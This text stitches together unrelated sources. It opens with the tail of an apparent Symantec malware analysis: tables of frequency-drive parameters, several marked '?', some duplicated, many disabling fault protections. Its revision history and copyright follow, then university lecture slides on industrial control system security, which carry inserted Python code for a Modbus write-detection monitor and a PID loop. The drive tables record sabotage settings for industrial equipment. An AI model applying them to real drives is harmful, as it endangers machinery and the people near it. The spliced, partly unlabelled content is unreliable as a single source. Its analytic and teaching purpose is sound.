471 0 Analogue output 2 signal selection
478 0 Analogue output 3/ signal selection
484 0 Analogue output 3 offset
312 0 digital output 1 function
490 0 Digital output 2 function
486 0 Digital output 1 signal selection
489 0 Digital output 2 signal selection
414 0 fault reset
415 0 acc/dec prohibited
416 0 DC-braking
750 1 Cooling monitor
1213 1 Emergency Stop (allinone)
1420 1 Prevention of startup (allinone)
399 0 scaling of current limit
400 0 scaling of DC breaking current
401 0 scaling of acc/dec time
405 0 external fault close
406 1 external fault open
407 1 run enable
411 1 control from fieldbus
409 0 control from I/O terminal
410 0 control from keyboard
107 44 current limit
107 440 current limit
509 0 Prohibit frequency area 1/ Low limit
510 0 Prohibit frequency area 1/ High limit
511 0 Prohibit frequency area 2/ Low limit
512 0 Prohibit frequency area 2/ High limit
513 0 Prohibit frequency area 3/ Low limit
514 0 Prohibit frequency area 3/ High limit
104 19990 deceleration time 1 ?
503 19990 deceleration time 2 ?
1541 19990 Selma Fault Word 1 - ?
1542 19990 Selma Fault Word 2 - ?
508 0 DC-braking time at stop
516 0 DC-braking time at start
506 1 stop function
505 0 start function
1500 1 Current limit (multimotor) or DIN5 function (lift app)
103 4000 acceleration time 1
502 4000 acceleration time 2
1531 1 Min frequency (highspeed multimotor)
125 3 control place
122 3 fieldbus control reference
102 1410
1502 1 Maximum frequency (highspeed multimotor)
1505 1 Current limit (highspeed multimotor)
1508 1 Nominal speed of the motor (highspeed multimotor)
1511 1 I/O reference (highspeed multimotor)
1514 1 Start function (highspeed multimotor)
1517 1 DC braking time at stop (highspeed multimotor)
1520 1 Measured Rs voltage drop (multimotor2)
1503 1 Acceleration time 1 (highspeed multimotor)
1506 1 Nominal voltage of the motor (highspeed multimotor)
1509 1 Nominal current of the motor (highspeed multimotor)
1512 1 Analogue output function (highspeed multimotor)
1515 1 Stop function (highspeed multimotor)
1518 1 Follower drive winding phase shift (advanced)
600 0 Motor control mode
521 0 Motor control mode 2
1522 1 Analogue output 4 inversion (advanced)
1526 1 DIN5 function (highspeed multimotor)
1525 1 Analogue output 4 scaling (advanced)
1532 0 Max frequency (highspeed multimotor)
1527 0 Analogue output 4 signal selection (advanced)
110 400 nominal voltage of motor
1519 1064
1516 1063
1520 29990 Measured Rs voltage drop (multimotor2)
1517 29990 DC braking time at stop (highspeed multimotor)
1522 1 Analogue output 4 inversion (advanced)
1526 1 DIN5 function (highspeed multimotor)
1525 1 Analogue output 4 scaling (advanced)
1519 1410
1516 1400
1517 4000 DC braking time at stop (highspeed multimotor)
1518 5990 Follower drive winding phase shift (advanced)
1513 1062
1510 1061
1507 1060
1504 1059
1501 1058
0 0

Table 16

Parameters and values for Fararo Paya drive
Parameter Value Possible Description
Frames 1.1
117 49
118 899
119 101
120 119
116 8000
116 12000
116 8000
116 16000
122 2
174 301
168 1
170 201
113 2
114 850
142 14000 Frequency?
111 1
112 61990
123 0
107 399
106 950
104 10500 Frequency?
101 10500 Frequency?
104 14001
111 10000
101 14000 Frequency?
103 10490
102 10480
166 1
173 1
169 1
112 30000
0 0
169 1
0 0
Frames 1.2
123 0
112 1
102 10
103 500
101 10000 Frequency?
104 10640 Frequency?
107 400
105 33
106 100
117 20
118 650
119 400
120 100
174 450
168 4
170 400
113 1
114 750
112 10
111 10
142 10640 Frequency?
169 1
173 1
Frames 2.1
117 49
118 899
119 101
120 119
116 8000
116 12000
116 8000
116 16000
122 2
166 1
174 301
168 1
170 201
113 2
114 850
102 1
108 1
109 1
105 280
106 281
103 400
112 1
111 30000
123 0
142 2
107 380
101 2
104 500 Frequency?
169 1
173 1
0 0
169 1
Frames 2.2
123 0
111 1
104 10640 Frequency?
103 500
101 10000
102 10
107 400
105 33
106 100
166 1
117 20
118 650
119 400
120 100
122 2
174 450
168 4
170 400
113 1
114 750
108 1500
109 1200
112 10
111 10
142 10640 Frequency?
169 1
173 1

Table 15 (continued)

Parameters and values for Vacon drive
Parameter Value Possible Description
Frames 1.2
812 12 Number of stop bits
0 0

Frames 2.1
813 2 ?
819 0
1086 1 Disable stop lock - allows parameters
adjusting during RUN state (allinone)
114 0 stop button
506 0 stop function
315 0 output frequency limit 1 supervision
346 0 output frequency limit 2 supervision
348 0 torque limit supervision function
350 0 reference limit supervision function
354 0 frequency converter temperature limit
supervision
356 0 analogue supervision signal
700 0 Response to the 4mA reference fault
701 0 Response to external fault
702 0 Output phase supervision
703 0 Earth fault protection
704 0 Motor thermal protection
709 0 Stall protection
713 0 Underload protection
727 1 Response to undervoltage fault
730 0 Input phase supervision
732 0 Response to thermistor fault
733 0 Response to fieldbus fault
734 0 Response to slot fault
740 0 Response to PT100 fault
1316 0 Brake fault action (allinone)
1082 0 SystemBus communication fault re-
sponse (allinone)
752 0 Speed error fault function
1353 0 Encoder fault mode (advanced)
303 0 reference scaling min value
304 0 reference scaling maximum value
305 0 reference inversion
434 0 fault
436 0 warning active
438 0 reference fault/warning
439 0 overtemperature warning
441 0 unrequested direction
444 0 external control place
445 0 external brake control
447 0 output frequency limit 1 supervision
448 0 output frequency limit 2 supervision
449 0 Reference limit supervision
450 0 Temperature limit supervision
451 0 Torque limit supervision
452 0 Thermistor fault or warning
463 0 Analogue input supervision limit
485 0 Scaling of motoring torque limit
464 0 Analogue output 1 signal selection
307 0 analogue output function
471 0 Analogue output 2 signal selection
472 0 Analogue output 2 function
478 0 Analogue output 3/ signal selection
479 0 Analogue output 3/ function
312 0 digital output 1 function
486 0 Digital output 1 signal selection
490 0 Digital output 2 function
489 0 Digital output 2 signal selection
414 0 fault reset
415 0 acc/dec prohibited
416 0 DC-braking
750 1 Cooling monitor
1213 1 Emergency Stop (allinone)
1420 1 Prevention of startup (allinone)
607 0 Overvoltage controller
1267 850 Brake chopper level (advanced)
1262 2 Overvoltage reference selection (ad-
vanced)
520 0 Flux brake
1522 0 Analogue output 4 inversion (advanced)
1526 0 DIN5 function (highspeed multimotor)
1525 0 Analogue output 4 scaling (advanced)
516 0 DC-braking time at start
508 0 DC-braking time at stop
515 1
505 0 start function
104 1 deceleration time 1
503 1 deceleration time 2
1541 1 Selma Fault Word 1 - ?
1542 1 Selma Fault Word 2 - ?
1531 0 Min frequency (highspeed multimotor)

1532 0 Max frequency (highspeed multimotor)


125 3 control place
601 160 switching frequency
399 0 scaling of current limit
400 0 scaling of DC breaking current
401 0 scaling of acc/dec time
405 0 external fault close
406 1 external fault open
407 1 run enable
411 1 control from fieldbus
409 0 control from I/O terminal
410 0 control from keyboard
600 0 Motor control mode
521 0 Motor control mode 2
108 2 U/f ratio selection
101 0 min frequency
107 44 current limit
107 440 current limit
110 380 nominal voltage of motor
606 2800 output voltage at zero frequency
111 80
112 144 nominal speed of motor
120 85 motor cos phi
605 2850 U/f curve/ middle point voltage
603 3000 voltage at field weakening point
604 40
1519 1
102 2
717 110 Automatic restart/ Wait time
718 120 Automatic restart/ Trial time
721 10 Automatic restart/ Number of tries after
overvoltage trip
722 3 Automatic restart/ Number of tries after
overcurrent trip
301 0 DIN3 function
313 0 RO1 function
314 0 RO2 function
103 3000 acceleration time 1
502 3000 acceleration time 2
1502 3000 Maximum frequency (highspeed mul-
timotor) ?
104 19990 deceleration time 1 ?
503 19990 deceleration time 2 ?
1541 19990 Selma Fault Word 1 - ?
1542 19990 Selma Fault Word 2 - ?
504 1 brake chopper
504 4 brake chopper
1531 1 Min frequency (highspeed multimotor)
0 0
0 0
506 1 stop function
0 0

Frames 2.2
506 0 stop function
1532 0 Max frequency (highspeed multimotor)
1541 1 Selma Fault Word 1 - ?
1542 1 Selma Fault Word 2 - ?
104 1 deceleration time 1
503 1 deceleration time 2
1522 0 Analogue output 4 inversion (advanced)
1526 0 DIN5 function (highspeed multimotor)
1525 0 Analogue output 4 scaling (advanced)
125 3 control place
1531 0 Min frequency (highspeed multimotor)
0 0
0 0
0 0
102 1064
108 2 U/f ratio selection
111 1064
604 50
603 10000 voltage at field weakening point
605 1000 U/f curve/ middle point voltage
606 330 output voltage at zero frequency
0 0
812 12 ?
1531 1 Min frequency (highspeed multimotor)
516 0 DC-braking time at start
505 0 start function
103 1 acceleration time 1
502 1 acceleration time 2
1502 1 Maximum frequency (highspeed mul-
timotor)
1522 0 Analogue output 4 inversion (advanced)
1526 0 DIN5 function (highspeed multimotor)
1525 0 Analogue output 4 scaling (advanced)
0 0
0 0
812 12 ?
0 0

Revision History
Version 1.0 (September 30, 2010)
• Initial publication

Version 1.1 (October 12, 2010)
• Added Windows Win32k.sys Local Privilege Escalation (MS10-073) section.
• Updates to Modifying PLCs section, based on MS10-073.
• Other minor updates.

Version 1.2 (November 3, 2010)
• Added Behavior of a PLC infected by sequence A/B section.

Version 1.3 (November 12, 2010)
• Updated the Modifying PLCs section.
• Added Appendix C.

Version 1.4 (February 11, 2011)
• New content added to the Infection Statistics, The monitor thread, Sequence C, and Variants sections.
• Minor edits and updates to Configuration Data Block, Behavior of a PLC infected by sequence A/B, and Other export hooks sections.

Any technical information that is made available by Symantec Corporation is the copyrighted work of Symantec Corporation and is owned by Symantec Corporation.

NO WARRANTY. The technical information is being delivered to you as is and Symantec Corporation makes no warranty as to its accuracy or use. Any use of the technical documentation or the information contained herein is at the risk of the user. Documentation may include technical or other inaccuracies or typographical errors. Symantec reserves the right to make changes without prior notice.

About the authors
Nicolas Falliere is a Senior Software Engineer, Liam O Murchu is a Development Manager, and Eric Chien is a Technical Director within Symantec Security Response.

Symantec Corporation, World Headquarters, 20330 Stevens Creek Blvd., Cupertino, CA 95014 USA. www.symantec.com

Copyright © 2011 Symantec Corporation. All rights reserved. Symantec and the Symantec logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.
Critical System Security
Week 2 – People, Roles and Responsibilities. IT vs ICS

Where are we so far?
• Week 1 - we introduced the Purdue model, investigating common sensors and actuators.

Purdue level recap
• Five levels:
• Level 4 - Business network (traditional security needs)
• Level 3 - Plant-wide control network
• Level 2 - Process/Cell/Line supervisory
• Level 1 - Process/Cell/Line controllers (PLC)
• Level 0 - Process/Cell/Line sensors and actuators (field devices)
• Remember that the purpose of the Purdue model is to reduce complexity.


This week's objectives
• This week's lecture:
• People
• Differences between IT and ICS security
• Challenges in cyber security
• This week's tutorial:
• Seminar – OT vs IT, security frameworks
• Programming a PLC
What is an Industrial Control System?

SCADA
What is an Industrial Control System?
From a cyber-security perspective:

- Enterprise zone (CIA)


- Control zone (Safety and Reliability)
- Field zone (Safety and Reliability)
Safety and reliability in ICS
• Field devices in critical infrastructure are designed as safety-critical, fault-tolerant systems that provide availability, reliability and safety. This has an impact on design and maintenance.
• Systems where the consequences of failure are high must be dependable systems; they follow these approaches:
• Fault avoidance - avoid faults by design, i.e., build the system correctly from the beginning
• Fault removal - reduce the presence of faults by verification and testing
• Fault tolerance - provide correct function despite the presence of faults
Fault Tolerance
NASA Space Shuttle Program
30 years of missions.
135 Missions Flown - 852 Fliers

• Mated Pairs (duplication removes single points of failure - SPF)
  A-B
  AXB
• Software running on multiple processors
• N-versions written by different programming teams.
• Quorum Voting (majority)
ICS PROFESSIONALS Roles and responsibilities

• It is important that we understand the roles of people. Having separation of responsibilities also helps to reduce risks.

• Process Engineer: designs and optimises the processes used in the control environment
• Field Technician: maintains the field devices
• Programmer: codes each step of the process, and deploys it to the controller
• Operator: manages/oversees the controlling of the process
ICS ORGANISATION Roles and responsibilities

• Owner/Operator: purchases and uses the system, responsible for the safe operation and meeting regulations
• Vendor: manufactures equipment and software, designs and builds the components used within control systems.
• Integrators: design, configure, test, train and refresh, responsible for selecting, creating and configuring a control system
• Government: guidance and regulation, responsible for safeguarding the public
Segregation of Duties

• One person may not perform the duties of more than one role where there could be a conflict of interest
• Limits the scope an individual has to attack, or misuse, the system.
• Limits the dependence the organisation has on any one individual.

Insider Risk
Insider risk refers to threats from individuals within the organization (employees, etc.)

1. Data Theft or Leakage: Intentionally or accidentally leaking sensitive information. Malicious intent (selling trade secrets), or through carelessness, like sending confidential data to the wrong person.

2. Fraud: Employees might engage in fraudulent activities for personal gain, such as embezzling funds or manipulating financial reports.

3. Sabotage: Disgruntled insiders may intentionally damage company property, disrupt operations, or impair the organization's data systems.

4. Intellectual Property Theft: Employees with access to intellectual property might steal it for personal use or to sell to competitors.

5. Compliance Violations: Insiders might inadvertently or deliberately violate regulatory requirements, leading to legal issues and penalties for the organization.

6. Misuse of Resources: Using company resources for unauthorized or personal purposes.

Insider Risk

[Diagram: Threat Actor (Intentions, Capabilities) → Threat; Threat + Vulnerability → Likelihood; Likelihood + Impact]
Personnel Vetting
Background check and evaluation of staff before they are given access to anything sensitive.
The process aims to assess the trustworthiness, reliability, and integrity of potential and existing employees or contractors.

1. Background Checks: This includes verifying personal information, educational qualifications, employment history, and any criminal records. Background checks help ensure that an individual does not have a history that could indicate a potential risk.

2. Reference Checks: Contacting previous employers and references to get insights into the individual's work ethic, behaviour, and integrity.

3. Security Clearance: For positions involving access to highly sensitive information, a security clearance process is carried out. This often involves a more in-depth background check and possibly even interviews with friends and family.

Martin, P., 2023. Insider risk and personnel security: An introduction. Taylor & Francis.
Personnel Vetting
1. Psychological Assessment: Some organizations conduct psychological assessments to evaluate an individual's suitability,
particularly for high-stress or high-security roles. This can help identify any behavioural traits that might pose a risk.

2. Financial Checks: Financial background checks can be important for roles that involve financial responsibilities. Financial distress could motivate insider threats such as fraud.

3. Training and Awareness: Ensuring that all personnel are aware of the organization's policies, ethical standards, and the
importance of security can help mitigate risks.

4. Access Control: Limiting access to sensitive information and areas to only those who absolutely need it, based on their role and
clearance level.

5. Legal and Regulatory Compliance: Ensuring that the vetting process complies with all relevant laws and regulations, including
privacy laws and anti-discrimination legislation.

6. Culture of Security: Fostering a workplace culture that values security and ethical behaviour can also help mitigate insider risks.

Worst Case
• What’s the worst thing an insider could do to the company?

Maliciousness
1. Intentionality (Malicious vs. Non-Malicious):
  1. Malicious Insiders: These individuals have intentional, harmful motives against the organization. They might engage in activities like theft, sabotage, espionage, or fraud.
  2. Non-Malicious Insiders: These are insiders who cause harm unintentionally. This could be due to negligence, lack of awareness, or accidents. For example, an employee might accidentally leak sensitive data by sending it to the wrong recipient or falling prey to a phishing attack.
Operational and Information Technology in ICS

A modern ICS is a complex system that depends on many different components and technologies to monitor and control physical processes.

Identifying the key differences between information technology (IT) and operational technology (OT) is vitally important in order to understand the challenges in securing an ICS [1]

What is OT and IT?

Information Technology (IT)
The technology involving the development, maintenance, and use of computer systems, software, and networks for the processing and distribution of data [1]

Operational Technology (OT)
Hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events [1]
Operational and Information Technology in ICS

1) IT and OT differences are found across the operational, technical and managerial
domains of the system.

2) We have specific security controls in each domain.

3) The differences in each domain introduce unique security challenges and constraints.

Before we analyse these challenges, let’s discuss the security controls in each domain in a
traditional IT system.
ISO27001
• ISO 27001 (formally known as ISO/IEC 27001:2005) is a specification for an Information Security Management System (ISMS).
• An ISMS is a framework of policies and procedures that includes all legal, physical and technical controls involved in an organisation's information risk management processes.
• The ISMS should fully detail all documentation, policies, practices, and all other aspects of information assurance, in order to support the business operation.
ISO 27001 Annex A
Controls are deliberately vague so that they can be implemented in different ways.

• Organizational Controls
• People Controls
• Physical Controls
• Technological Controls
BSI (2022) Cybersecurity ISO 27001: Cybersecurity ISO 27001. British Standards Institute.
Status: Current | Published 31/12/2022

Permalink : https://uwe.primo.exlibrisgroup.com/permalink/44UWE_INST/52fmuk/cdi_bsi_primary_000000000030452923
Security Controls in short

Security controls help reduce risks in an organisation. They attempt to prevent or limit the impact of a security incident [2].

1) Technical controls use technology
2) Management controls use administrative or management methods
3) Operational controls are implemented by people in day-to-day operations
4) Compliance controls, e.g. privacy, laws and clauses
1) Technical Security Controls

A technical control is one that uses technology to reduce vulnerabilities. An administrator installs and configures a technical control, and the technical control then provides the protection automatically [2].

- Encryption. Protect the confidentiality of data transferred over a network and data
stored on devices.
- Antivirus software. Protection against malware infection.
- Intrusion detection systems (IDSs). Monitor a network or host for intrusions.
- Firewalls. Restrict network traffic going in and out of a network.
2) Management Security Controls

Management controls use planning and assessment methods to reduce and manage risk. Many provide an ongoing review of an organization’s risk management capabilities [2].

- Risk assessments. Quantify and qualify risks within an organization so that the organization can focus on the serious risks.
- Vulnerability assessments. Discover current vulnerabilities or weaknesses.
- Penetration tests. These go a step further than a vulnerability assessment by
attempting to exploit vulnerabilities.
3) Operational Security Controls

Operational controls help ensure that day-to-day operations of an organisation comply with their overall security plan [2].

- Awareness and training. Helps users maintain password security, follow a clean desk policy,
understand threats such as phishing and malware, and much more.
- Configuration and change management. Ensure that systems start in a secure state. Ensure
that changes don’t result in unintended configuration errors.
- Contingency planning. The goal is to reduce the overall impact on the organisation if an outage
occurs.
- Media protection. Media includes physical media such as USB flash drives, external and internal
drives, and backup tapes.
- Physical and environmental protection. Cameras, door locks, and environmental controls such
as heating and ventilation systems.
Differences between IT and OT

Operational:
- Operational Objectives
- High Availability
- Geographic Location

Technical:
- Embedded Systems
- Network Protocols
- Real-time Performance
- Legacy Technologies

Managerial:
- Long Lifecycles
- Finances/Investments
- Vendors & Procurement
- Managerial Domains
Differences between IT and OT
Factors that influence the differences between IT and OT

IT Security:
Data
• Integrity
• Confidentiality
• Availability

OT Security:
Data
• Integrity
• Confidentiality
• Availability
Physical Process
• Safety
• Environment
• Dependencies
• Regulation
Operational differences between IT and OT - Operational Objectives
Examples of foundational ICS objectives include:
• maintaining profitable margins,
• minimising the safety or environmental impacts,
• limiting damage or wear to physical assets,
• managing broader societal dependencies on the ICS.

Cybersecurity is an important property to support many of these objectives; however, it is usually not a main operational objective. The organization must balance the importance of cybersecurity with respect to many other operational challenges.

- Safety (1999 Bellingham, WA gasoline pipe leak)
- Environmental (2010 Australia sewage plant ICS failure)
- Societal Dependencies (2003 Northeastern U.S. power outage)
- Physical Infrastructure (2010 Stuxnet)
Operational differences between IT and OT - High Availability
Examples of ICS with high availability requirements:

Electric power grid, water/gas systems and manufacturing systems (can only be down for 5 to 50 min during a year).

This affects:
- Security updates/patches
- Security assessment
- “Fail-closed/Deny access” security mechanisms

Five Nines
99.999%
5 ½ mins a year
Operational differences between IT and OT - Geographic Location
Geographic dispersion creates problems implementing physical system protections, leaving the system vulnerable to physical tampering.

If an attacker can tamper with a remote device, they could manipulate the control of that device, spoof measurement data originating from the device, or gain access to system data. They can often obtain data (passwords and cryptographic keys) important to accessing other system resources.

Distributed systems also present system management challenges since operators and engineers cannot always physically access the system. They must implement remote administration interfaces to perform these functions from a central location.
Technical differences between IT and OT
Key differences:

- Unique communication protocols and architectures,
- Real-time performance demands,
- Dependence on resource constrained embedded devices,
- Domain-specific device manufacturers and integrators,
- Complex integration of digital, analog, and mechanical controls.
Technical differences between IT and OT - Embedded Systems
Embedded systems have resource constraints, such as limited processing power, storage, and bandwidth.

- Systems with limited memory and processing power often cannot support certain security mechanisms, such as intrusion detection or anti-virus software.
- Performing real-time system operations complicates the scheduling of system processes, leaving very little time to schedule security related tasks.
- Security mechanisms also increase the power consumption, thereby directly reducing the lifespan of devices depending on battery power.
Technical differences between IT and OT - Network Protocols

           IT                            OT
Protocols  HTTP, DNS, SSH, SMTP, NTP     Modbus, EtherCat, BACnet
Data       Large payloads                Analog, binary values
Security   Recently developed            Still emerging
Technical differences between IT and OT - Real-time Performance

Communication latency is extremely important.

IEC 61850 communication latency requirements: from 3 to 500ms depending on message type.

2048 bit RSA cryptographic operation adds 61.04ms.
Technical differences between IT and OT - Legacy Technologies
Legacy systems traditionally do not have sufficient security mechanisms to protect against many modern threats.

Legacy network protocols typically lack support for encryption and authentication of messages sent across untrusted networks.

On the software side, these systems often lack user authentication, access control, and auditing capabilities.

Often they have not undergone rigorous security testing during their design to verify they don’t have security vulnerabilities or backdoors.

VPNs and firewalls can encapsulate the legacy devices and implement required security functions.
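Because a legacy protocol such as Modbus/TCP (listed in the protocols table above) carries no authentication, the compensating control is a firewall or passive monitor that applies a source-based policy. The following is an added example, not from the slides: it parses Modbus/TCP requests and alerts on write function codes from hosts outside an assumed allow-list, and on malformed frames. The sample traffic and the allow-list address are constructed.

```python
"""Passive monitor for Modbus/TCP: flag write requests from hosts that are not
allowed to write, plus malformed frames.

Added example, not from the slides. Frames are constructed sample traffic and
the allow-list of engineering-workstation addresses is an assumption.
"""
import struct
from dataclasses import dataclass
from typing import Optional

# Public function codes from the Modbus application protocol.
WRITE_FUNCTIONS = {5: "Write Single Coil", 6: "Write Single Register",
                   15: "Write Multiple Coils", 16: "Write Multiple Registers",
                   23: "Read/Write Multiple Registers"}
READ_FUNCTIONS = {1: "Read Coils", 2: "Read Discrete Inputs",
                  3: "Read Holding Registers", 4: "Read Input Registers"}


@dataclass
class ModbusRequest:
    transaction_id: int
    unit_id: int
    function: int
    address: Optional[int]    # starting address for the common read/write codes
    data: bytes


def parse_modbus_tcp(frame: bytes) -> ModbusRequest:
    """Decode the 7-byte MBAP header plus function code; raise on malformed input."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header + function code")
    tid, proto, length, unit, func = struct.unpack(">HHHBB", frame[:8])
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus")
    if length != len(frame) - 6:                 # length counts unit id onwards
        raise ValueError("MBAP length field does not match frame size")
    data = frame[8:]
    address = struct.unpack(">H", data[:2])[0] if len(data) >= 2 else None
    return ModbusRequest(tid, unit, func, address, data)


def classify(src_ip: str, frame: bytes, allowed_writers: frozenset) -> Optional[str]:
    """Return an alert line, or None for expected traffic."""
    try:
        req = parse_modbus_tcp(frame)
    except ValueError as err:
        return f"ALERT malformed Modbus/TCP from {src_ip}: {err}"
    if req.function in WRITE_FUNCTIONS and src_ip not in allowed_writers:
        return (f"ALERT {WRITE_FUNCTIONS[req.function]} on unit {req.unit_id} "
                f"address {req.address} from unexpected host {src_ip}")
    if req.function not in WRITE_FUNCTIONS and req.function not in READ_FUNCTIONS:
        return f"ALERT unusual function code {req.function} from {src_ip}"
    return None


def build_frame(tid: int, unit: int, func: int, data: bytes) -> bytes:
    """Assemble a request frame (used here only to construct sample traffic)."""
    body = bytes([unit, func]) + data
    return struct.pack(">HHH", tid, 0, len(body)) + body


# Constructed capture: (source address, raw frame).
SAMPLE_TRAFFIC = [
    ("10.0.2.10", build_frame(1, 1, 3, struct.pack(">HH", 0, 10))),    # HMI polls 10 registers
    ("10.0.2.20", build_frame(2, 1, 6, struct.pack(">HH", 100, 500))), # engineering station writes
    ("10.0.9.77", build_frame(3, 1, 6, struct.pack(">HH", 100, 0))),   # unknown host writes
    ("10.0.9.77", b"\x00\x04\x00\x00\x00\x02\x01"),                    # truncated frame
]
ALLOWED_WRITERS = frozenset({"10.0.2.20"})   # assumption: the engineering workstation


def run_detector(traffic=SAMPLE_TRAFFIC, allowed_writers=ALLOWED_WRITERS) -> list:
    """Run classify() over a capture and collect the alert lines."""
    alerts = []
    for src_ip, frame in traffic:
        alert = classify(src_ip, frame, allowed_writers)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for line in run_detector():
        print(line)
```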
Managerial differences between IT and OT - Long Lifecycles
Large costs to procure, deploy, and integrate the various systems (relays in power systems are typically expected to operate for over 20 years)

- Difficult to address evolving cyber threats
- Dependencies on unsupported systems (Windows XP is still used in ICS)
Managerial differences between IT and OT - Finances/Investments
• The revenue structure of an ICS is often based on fixed service rates, such as public utilities, that have limited control over their budget for cybersecurity.

• A government body may regulate utility cost without taking security into account; lack of expertise
Managerial differences between IT and OT - Vendors & Procurement
ICS domains also have product vendors and system procurement processes that differ from IT environments.

Reported vulnerabilities often go unpatched; and in the case that a patch is available, it often cannot be applied due to concerns that it will impact system availability.

System updates often have to undergo additional testing to verify they work reliably with the unique configurations and other OT software platforms.
Managerial differences between IT and OT - Managerial Domains
Unique staff focussing on IT and OT.

Can create conflict over who has managerial responsibility over the different systems and software deployed in the ICS.

Because the OT components will often also include some commodity IT technologies, the IT staff could negatively impact the operation of the ICS by performing an incorrect configuration or adding a potentially problematic patch.
Convergence of IT technologies into ICS

Current trends are creating a convergence of these domains:
- technological advances
- pressure to reduce operating cost

For example: Many ICS protocols, such as DNP3, originally operated over serial networks (i.e. RS-232), but are now commonly based on IP.

While these trends provide a number of advantages, they also introduce an undetermined amount of risk to the ICS.
Distributed Control System (DCS)

• Introduced in 1975
• Custom-designed for a plant, controllers running proprietary protocols.
• Often found in Purdue Level 1, connecting directly to field devices (Purdue Level 0) and HMIs (Purdue Level 2)
• Usually designed with redundancy built in.
• Co-operatively control complex processes within a site
• Complete with PLC solutions
Programmable Logic Controller (PLC)

• Created to increase flexibility and decrease the proprietary nature of custom solutions
• Programmable by an engineer
• Reprogrammable
• Expandable
Basic IO

• Digital
  • Voltage often Boolean (present/absent)
  • Sensors: position, state
  • Actuators: stepper motor, relay
  • Represented as binary or boolean expressions
• Analog
  • Value is a range 0-24v or impedance
  • Sensors: dial, speed, flow, pressure
  • Actuator: variable speed
  • Represented as integers or floating points
Controller Logic - the basics

• Setpoint (SP)
• Process Value (PV)
• Manipulated Variable (MV)
• Error (E = difference between PV and SP)
• Using a PID algorithm we can begin to define the process
  • Proportional Term - size of the error
  • Integral Term - duration
  • Derivative Term - rate of change
Define the logic
We started this last week (week 2)

• Start with the degrees of truth,
• Consider a twin tap,
  • If flow is too low (PV<SP), then increase water valves
  • If flow is too high (PV>SP), then decrease water valves
  • If temperature is too low (PV<SP) then increase hot, decrease cold
  • If temperature is too hot (PV>SP) then increase cold, decrease hot
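The controller basics and the twin-tap rules above, carried through as an added example (not code from the slides): a discrete PID loop using the slides' SP/PV/MV/E names, run against a constructed first-order tank-flow model, with output clamping, anti-windup and a sanity check that holds the last MV when the PV is outside the sensor's plausible range (a faulty or spoofed measurement). The gains, process model and sensor range are constructed assumptions.

```python
"""Discrete PID loop for the twin-tap flow example.

Added example, not code from the slides. Names follow the slides: SP (setpoint),
PV (process value), MV (manipulated variable), E = SP - PV. The tank/valve model,
gains and sensor range are constructed for illustration.
"""
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class PID:
    kp: float                  # proportional: reacts to the size of the error
    ki: float                  # integral: reacts to how long the error persists
    kd: float                  # derivative: reacts to the rate of change
    mv_min: float = 0.0        # valve fully closed (% open)
    mv_max: float = 100.0      # valve fully open (% open)
    pv_min: float = 0.0        # plausible sensor range (assumed), for a sanity check
    pv_max: float = 100.0
    integral: float = field(default=0.0, init=False)
    prev_error: Optional[float] = field(default=None, init=False)
    last_mv: float = field(default=0.0, init=False)

    def step(self, sp: float, pv: float, dt: float) -> float:
        """Compute the MV for one control interval of dt seconds."""
        # A PV outside the sensor's physical range is a fault or a spoofed
        # measurement: hold the last output rather than drive the valve on it.
        if not (self.pv_min <= pv <= self.pv_max):
            return self.last_mv
        error = sp - pv                                   # E = SP - PV
        p_term = self.kp * error                          # size of the error
        d_term = 0.0 if self.prev_error is None else self.kd * (error - self.prev_error) / dt
        # Anti-windup: stop accumulating the integral while the valve is already
        # saturated in the direction the error is pushing.
        unsaturated = p_term + self.integral + d_term
        pushing_past_limit = ((unsaturated >= self.mv_max and error > 0) or
                              (unsaturated <= self.mv_min and error < 0))
        if not pushing_past_limit:
            self.integral += self.ki * error * dt         # duration of the error
        mv = p_term + self.integral + d_term
        mv = min(max(mv, self.mv_min), self.mv_max)       # clamp to valve range
        self.prev_error = error
        self.last_mv = mv
        return mv


class TapFlowProcess:
    """Constructed first-order model: flow settles to gain * valve with time constant tau."""

    def __init__(self, gain: float = 0.5, tau: float = 5.0):
        self.gain, self.tau, self.flow = gain, tau, 0.0

    def update(self, valve: float, dt: float) -> float:
        target = self.gain * valve                        # steady-state flow (L/min)
        self.flow += (target - self.flow) * dt / self.tau
        return self.flow


def twin_tap_split(signed_mv: float) -> tuple:
    """Map a signed temperature MV to (hot, cold) valve openings, as on the slide:
    too cold (positive MV) opens hot and closes cold; too hot does the reverse."""
    return max(signed_mv, 0.0), max(-signed_mv, 0.0)


def run_flow_loop(sp: float = 20.0, steps: int = 200, dt: float = 0.5) -> tuple:
    """Regulate flow to sp; returns the final (PV, MV)."""
    pid = PID(kp=2.0, ki=0.8, kd=0.2)
    plant = TapFlowProcess()
    pv, mv = 0.0, 0.0
    for _ in range(steps):
        mv = pid.step(sp, pv, dt)
        pv = plant.update(mv, dt)
    return pv, mv


if __name__ == "__main__":
    final_pv, final_mv = run_flow_loop()
    print(f"PV={final_pv:.2f} L/min at MV={final_mv:.1f}% open")
```

For the temperature loop, construct the PID with mv_min=-100 and mv_max=100 and pass its output through twin_tap_split to drive the hot and cold valves.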
PID Theory
Programming Final Logic

• Typically ICS run real-time systems and rely on firmware.
• IEC 61131-3 defined 5 programming approaches:
  • Ladder Logic - designed for technicians
  • Function Block - blocks with a purpose are joined together to gain the desired I/O
  • Structured Text - written in statements similar to C
  • Instruction List - similar to Assembly language
  • Sequential Function Chart
Smart field devices

• Categorised as Industrial Internet of Things (IIOT)
• Has a defined, limited function
• Usually controlled using a Micro Controller
• Contains logic which cannot be changed
• Examples:
  • Phasor measurement unit (PMU)
  • Smart meters
Today's Tutorial

• Discussing details from today's lecture. Discussing the application of security techniques to a typical ICS topology.
• Extended activity - Practical lab, Programming a PLC within a VM (instructions can be found on Blackboard)
Reading

• CyBOK Physical Systems Security [to page 30]
References

[1] Colbert, E.J.M., Kott, A. & SpringerLink (Online service) 2016, Cyber-security of SCADA and Other Industrial Control Systems, Springer International Publishing, Cham.

[2] https://blogs.getcertifiedgetahead.com/security-controls-implementation-3-of-3/ [Retrieved on 14/01/2019]
Next week

• Lecture
• Networking protocols and
design principles

• Tutorial:
• Control Systems, HMI
Attack Vectors

Dr Andrew McCarthy
Recap

• Levels 0-4
• SCADA
• Protocols
Protocols

